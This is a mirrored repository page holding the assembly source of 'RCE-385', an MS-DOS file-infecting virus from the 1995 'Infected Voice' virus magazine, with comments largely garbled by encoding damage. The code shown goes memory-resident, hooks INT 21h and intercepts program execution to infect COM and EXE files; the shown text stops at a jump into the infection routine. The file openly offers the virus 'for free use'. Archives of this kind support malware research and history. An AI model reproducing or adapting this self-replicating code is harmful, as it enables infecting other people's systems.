Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-07-05 09:52:02 +00:00
Code Releases Activity
7188d64696
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.rce.asm

391 lines
18 KiB
NASM
Raw Normal View History

Add files via upload
2021-01-12 23:55:26 +00:00
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;<3B> STEALTH group ۰ <20> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20> <20> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><> <20><>
;<3B> presents ۰ <20> <20> <20> <20><> <20><> <20> <20> <20><> <20> <20> <20> <20> <20> <20> <20> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۰ <20> <20> <20> <20> <20><><EFBFBD> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> JAN 1995
;
; INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10.
; THE FIRST UNIQUE VIRUS MAGAZINE IN FORMER U.S.S.R.!!!
;
;--- RCE-385 (!).-------------------------------------------------------------
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0A5AC><EFBFBD> <20><>諨 - <20><><EFBFBD><EFBFBD><EFA2A8><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><20><><EFBFBD><EFBFBD><E2AEA2> <20> <20><><EFBFBD><EFBFBD>ᠫ ᢮<>
;<3B><><EFBFBD>⮢᪨ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> AdInf -> <20><> <20> <20><><EFBFBD> <20><><><E2A5AF><EFBFBD>?<3F>-<2D><>,⥯<><E2A5AF><EFBFBD><><E1A8A4> <20><> <20><><EFBFBD><E5ADAE><EFBFBD><EFBFBD><EFBFBD>
;<3B> <20><EFBFBD><E2A5AD><EFBFBD> <20><><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E0A5AC><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD> <20><><EEA7A5><><E6A5AB> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>,
;<3B> <20><> - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD><><E2A0AA> <20><><EFBFBD><20> RAM<41>.
; <20><><E2A5AF><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E2A0A2><EFBFBD> <20><EFBFBD><20><><EFBFBD> - <20><><EFBFBD><EFBFBD> <20><><EFBFBD>,<2C><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<21><><EFBFBD><EFBFBD> <20><EFBFBD><E2A5AB>
;<3B><EFBFBD><E0A8A7><EFBFBD><E3ACA0><EFBFBD><EFBFBD> : "<22><> <20><><EFBFBD> <20><><><E1A4A5><><><><EFBFBD><EBA2A0>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> *beep <20>
;*beep".<2E> <20> <20><><EFBFBD> <20><><EFBFBD> <20><>襫 ࠧ<><E0A0A7><EFBFBD> <20> <20><EFBFBD> <20><><EFBFBD><E0ACA0><EFBFBD>.<2E><><EFBFBD> <20><EFBFBD><E0A5A4><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><20> <20><><EFBFBD><EFBFBD>饭-
;<3B><><EFBFBD> <><E0A5A6> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ⥬ ᠬ<><E1A0AC> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EBA2A0><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E8A5A2><EFBFBD>
;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD><><20><><EFBFBD><E2A5AA><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD>
;<3B><> *beep <20><><EFBFBD><EFBFBD><E1AAA0>!<21><> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> *beep<65><70>!<21><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E8A0A9> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0ACA0> --
;<3B><> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>⬠!!!<21><><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFAAA8>
;ॢ<><E0A5A2><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0ACA0><EFBFBD><><> <20><><EFBFBD><EFBFBD><EFBFBD>.<2E><><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ஢!
;(<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>뫨 Basic).<2E> <20><><EFBFBD><E7A8AB> <20><><EFBFBD> - <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><E1A0A4>"!
; <20><><20><><EFBFBD><><E6A2A5><EFBFBD><E7AAA0> <20><><EFBFBD><EFBFBD><EBA2A0><EFBFBD><EFBFBD>!<21> <20><><EFBFBD> <20><EFBFBD><EFBFBD><E2A0A2><>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD><E8ABA5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><> <20><EFBFBD><E0AEA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><> ⥮ਨ <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD>襩-<2D><><EFBFBD><E0ACA0><EFBFBD>!<21><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><E8ABAE> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><E2A0A2><EFBFBD><EFBFBD> <20><><EFBFBD><E1AEA1>-<2D><><EFBFBD>-<2D><><EFBFBD><E7A8AD><EFBFBD><EFBFBD><EFBFBD>.
;<3B><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> RCE-666 (<28><><EFBFBD><EFBFBD> <20><>ᠭ).Aidstest <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: INFO /666,Web: Die-666.
;<3B><> <20><><20><><EFBFBD><E0A5A7> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>쪮,<2C><><EFBFBD><EFBFBD><20> RCE-385!
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>- <20><EFBFBD><E7A5A1><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E2A0AD>,<2C> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>஢ - <20><><EFBFBD>⮩-
;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
;-----------------------------------------------------------------------------
;(c) Light General.Kiev.1995. STEALTH group . For free use!
;-----------------------------------------------------------------------------
cseg segment
assume cs:cseg,ds:cseg
org 100h
start:
nop ; <20><EFBFBD><E0A8A7><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD><EFBFBD> .COM 䠩<><E4A0A9>.
jmp virr
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>.(<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 30 <20><><EFBFBD><EFBFBD>).
nop
nop
mov ah,09
lea dx,wrn
int 21h
mov ax,4c00h
int 21h
;--------------------------------------
wrn db 'FRODO LIVES!$'
;--------------------------------------
;################# VIRUS ##################
virr:
call $+3
pop si
sub si,03
;-Hacked mem.-----------------------------------------------------
push si
clc
mov ax,0FEFEh ; <20><EFBFBD><E0AEA2><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
int 21h ; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><><E1A8A4> <20> <20><><EFBFBD> <20><> <20><>
jc exit_v ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><> CF!
;- <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><EFBFBD><E0AEA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EBA2A0><EFBFBD>" 512 <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!-------------
; <20>ਭ樯 <20><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EBA2A0><EFBFBD>" <20><EFBFBD><EFBFBD><EBA2A0><EFBFBD><EFBFBD> <20><> ⮬,<2C><><EFBFBD> <20><><EFBFBD> <20><EFBFBD><EBAFAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>
;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><20><> <20><><EFBFBD><EFBFBD><EFBFBD><><E2A0AA> <20><><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><EFBFBD><EBA4A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD>)
;---(1)--- MCB - Memory Control Block (<28><><EFBFBD><EFBFBD> <20><><EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
; <20><><EFBFBD><20><><E2A0AA> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS <20><><EFBFBD><EFBFBD><EFBFBD><EBA2A0> <20><EFBFBD><EBA4A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC><EFBFBD> <20><><EFBFBD><EFBFBD><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><E9A5AD> <20><EFBFBD><E7A5A9> <20><> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E7A5AD>
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>. <20> <20>
; <20> <20>
; 00 <20> 1b <20> <20><20><EFBFBD> 'M' <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD>
; <20> <20> 'Z' <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD>.
; 01 <20> 1w <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> (<28> <20><><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><EBA4A5><EFBFBD> <20><><EFBFBD><EFBFBD>).
;++++> 03 <20> 1w <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><E0A0A3><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><E0A0A3><EFBFBD> = 16 <20><><EFBFBD><EFBFBD>)
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ⮫쪮 <20><><EFBFBD>! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;
;---(2)--- PSP - Program Segment Prefix (<28><><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC><EFBFBD><EFBFBD><EFBFBD><><E1A5A3><EFBFBD><EFBFBD><EFBFBD>)
; <20><><EFBFBD><EFBFBD><EFBFBD><><EFBFBD><E0A6A8><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E0ACA0><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E1AAA0><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>!
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><E9A5AD> <20><EFBFBD><E7A5A9> <20><> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><E7A5AD>
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>. <20> <20>
; <20> <20>
; 00 <20> 1w <20> <20> <20>⮬ ᫮<><E1ABAE> <20><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> int 20h (CD 20h)
;++++> 02 <20> 1w <20> <20><>騩 ࠧ<><E0A0A7><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><EBA4A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>!
; <20> <20> (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><20>ணࠬ<E0AEA3><E0A0AC> DOS <20><EFBFBD><EBA4A5><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>
; <20> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><> <20><><EFBFBD><EFBFBD><EFBFBD>" 640 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!)
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;-- <20><><EFBFBD> <20><><EFBFBD>,<2C><EFBFBD><E2ADA8><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><20><><EFBFBD><EFBFBD><E7A5AD> <20><> <20><EFBFBD><EBA4A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD>,<2C><> <20><><EFBFBD><EFBFBD><EFBFBD><><E1A4A5><EFBFBD><EFBFBD>
;"<22><><EFBFBD><EFBFBD><EFBFBD>" <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><E0A5AD><EFBFBD><EFBFBD> <20>㤠 ⥫<> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
; <20><EFBFBD><E0A0AA><EFBFBD><EFBFBD><EFBFBD><><E0A5A0><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
mov ax,ds
dec ax
mov es,ax
sub word ptr es:[03],35 ;* 512b
sub word ptr ds:[02],35 ;* 512b
mov es,ds:[02] ; ES = ᥣ<><E1A5A3><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD>. "<22><><EFBFBD><EFBFBD><EFBFBD>." <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
push ds cs
pop ds
xor di,di
mov cx,offset ax_len-offset virr ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
rep movsb ; <20><><EFBFBD><20><><EFBFBD><EFBFBD><EFBFBD> <20> "<22><><EFBFBD>." <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
;-Install int.----------------------------------------------------
mov al,21h
mov dx,offset int_21h_entry-offset virr
mov si,offset ofs_21h-offset virr
push es
pop ds
call inst_int ; <20><><EFBFBD><E2A0AD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> int 21h <20><><>
; <20><><EFBFBD><E0A0A1>稪.
pop ds
exit_v:
push ds
pop es
pop si
;- COM or EXE ?---------------------------------------------------
; <20><EFBFBD><20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><><E4A0A9> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><E2AEA2><EFBFBD>?
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><E0A5A4><EFBFBD> <20><><EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD> .COM <20><><EFBFBD> .EXE <20>ணࠬ<E0AEA3><E0A0AC>
; <20><EFBFBD><EFBFBD><E5AEA4> <20><><><E0A0A7><EFBFBD><EFBFBD>!
cmp byte ptr cs:[si+offset origin_2_byte-offset virr+1],'Z'
jz L_exe
;-<2D>oc<6F><EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20>.<2E>.-------------------------------------
; <20> .COM 䠩<><E4A0A9> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD><EFBFBD><><E4A0A9> <20><> <20><>᪥!(<28><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>).
mov di,100h
add si,offset origin_2_byte-offset virr
; SI = <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><EFBFBD><E0A8A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><20><><EFBFBD><EFBFBD> .COM 䠩<><E4A0A9>!
push di
movsw
movsw
xor ax,ax
ret ; Go to infected com program.
;-Loaded from exe file.--------------------------------------------
; <20> <20><><EFBFBD> <20><><EFBFBD> ᯮᮡ <20><><EFBFBD>樨 .EXE <20>ணࠬ<E0AEA3><E0A0AC>!
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><EFBFBD><E5AEA4> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> : <20>.<2E>. <20><><EFBFBD> <20><><EFBFBD><E0A0A6><EFBFBD><EFBFBD><><E4A0A9> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><><EFBFBD><EBA2A0> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><> <20><><EFBFBD><EFBFBD><EFBFBD><E1AAA0>!
; (<28><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD><><E2A0AA> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .EXE 䠩<><E4A0A9> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20>.<2E><><EFBFBD><EFBFBD><EFBFBD>
; "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><E1A5AC><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> IBM PC <20> <20>ணࠬ<E0AEA3><E0A0AC><EFBFBD><E0AEA2><EFBFBD><EFBFBD>" (<28><><EFBFBD>. 362)
L_exe:
mov ax,es
add ax,10h
add cs:[offset CS_file-offset virr][si],ax
; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><E1ABA8><><E1A5A3><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><E0A5A4><EFBFBD> <20><><EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD>!
db 0eah ;-
IP_file dw ? ;- JMP Far CS_file:IP_file
CS_file dw ? ;-
;------------------------------------------------------------------
; <20> <20><><EFBFBD><><EFBFBD><E2A2A5><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD><E2A2A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><E0A0A6><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3>!
int_21h_entry proc
cmp ax,0FEFEh ;-<2D>᫨ ᮡ<><E1AEA1><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><E8A8A2><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
jnz _@1 ;-᢮<><E1A2AE><><E0AEA4> <20><> <20><><EFBFBD><EFBFBD> <20><>㦥᪨<E3A6A5> <20><EFBFBD>.
stc ;-
int_24h_entry:
mov al,03
retf 2
_@1:
cmp ax,4b00h ; <20>᫨ DOS <20><><EFBFBD><E2A0A5><EFBFBD> <20><EFBFBD><EBAFAE><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>
jnz exit_all ; <20><> <20><> <20><><EFBFBD><E0A0A6><EFBFBD> <20><>!
jmp infecting ;
exit_date:
